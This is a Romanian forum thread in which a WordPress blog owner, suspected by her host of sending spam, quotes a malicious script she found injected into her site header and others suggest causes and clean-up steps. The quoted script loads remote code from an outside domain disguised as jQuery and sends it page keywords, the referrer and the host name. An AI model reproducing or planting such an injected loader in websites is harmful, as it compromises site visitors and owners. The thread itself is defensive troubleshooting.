Suspectare trimitere email spam .

yepuras

Vedeta
Registered
Full Member
Deschid acest topic atat pentru mine cat si pentru cei care vor avea o astfel de problema pe viitor .
Am primit email de la cei unde am hostate mai multe bloguri precum ca sunt suspectata ca trimit email spam de pe un blog .
Asa ca astazi am intrat pe acel blog in wp-admin la sectiunea header unde am gasit acest cod :

Cod:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://theclassicalfourplus1.com/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://theclassicalfourplus1.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Am sters momentan acest cod si la sugestia lui alex am facut backup si acum incerc sa remediez problema , orice sugestie este binevenita .
 
poate ne spui si cum a ajuns acolo, adica daca ai instalat vreun plugins/script, asta ca sa stim cum se "protejam"
 
Am citit mesajul si se pare ca este doar de un domeniu.

Posibile cauze:
1. instalat plugin sua thema care contine coduri mailicioase
2. cineva are acces la wp-admin unde a inserat un code de send e-email
3. sisteme de reclame care abuzeaza si infecteaza site-urile
4. calculatorul este virusat si a infectat fisierele urcate pe server.

Am oprit serviciul de send e-mail pe server.
Tu acum trebuie sa verifici pe ftp daca ai fisiere suspecte.
 
Am de ceva timp probleme cu acest blog si sincer Cnusi imi pare rau ca nu iti pot spune cum am reusit sa iau acel virus , cod , ce este .
Cert este ca ma-m trezit cu el si mi-a creat probleme si ma bucur ca intr-un fel am reusit sa-l depistez si sa-l elimin .
Insa mai mult ca sigur merg pe varianta ca am urcat o thema si cum toate au fost ****** si nu am stiut sa le verific cred ca am urcat cu tot cu acel cod sau o intrare pe unde respectivul a facut ce a vrut .
Acum alex am facut backup , momentan fac download in comp dupa ce inlatur si blogul cu pricina pe care nu il mai folosesc , intru si verific in ftp si revin cu noi intrebari .
 
Acum dupa ce ai descarcat tot in calculator, recomand sa scanezi totul.
1. dezarhivezi fisierul backup
2. scanare cu avg, mallwarebyte, spybot sau chiar online cu virustotal
3. daca gaseste ceva, vezi locatia si daca nu este ceva important sterge, daca este atunci trebuie verificat fisierul ori rescris cu cel original.
 
Din curiozitate acum am intrat pe server si pe langa backup ce am facut la tot inainte care a fost undeva la 5gb , am dat sa mai fac inca unul fara acel blog care a fost sters si de aceasta data am doar 2,8gb .
Ce mi se pare curios este faptul ca pe blogul sters aveam doar 25 de articole undeva in 150 de cuvinte fiecare .
 
Pai din ce am vazut pe ftp, aveai multe arhive zip si rar plus alte fisiere care nu aveau treaba cu blogul.
Asta este inca un motiv pentru care e bine sa verifici fisierele din acel blog. Cu total commander poti vedea cati mb/gb are fiecare folder.
 
Loading...
Back
Sus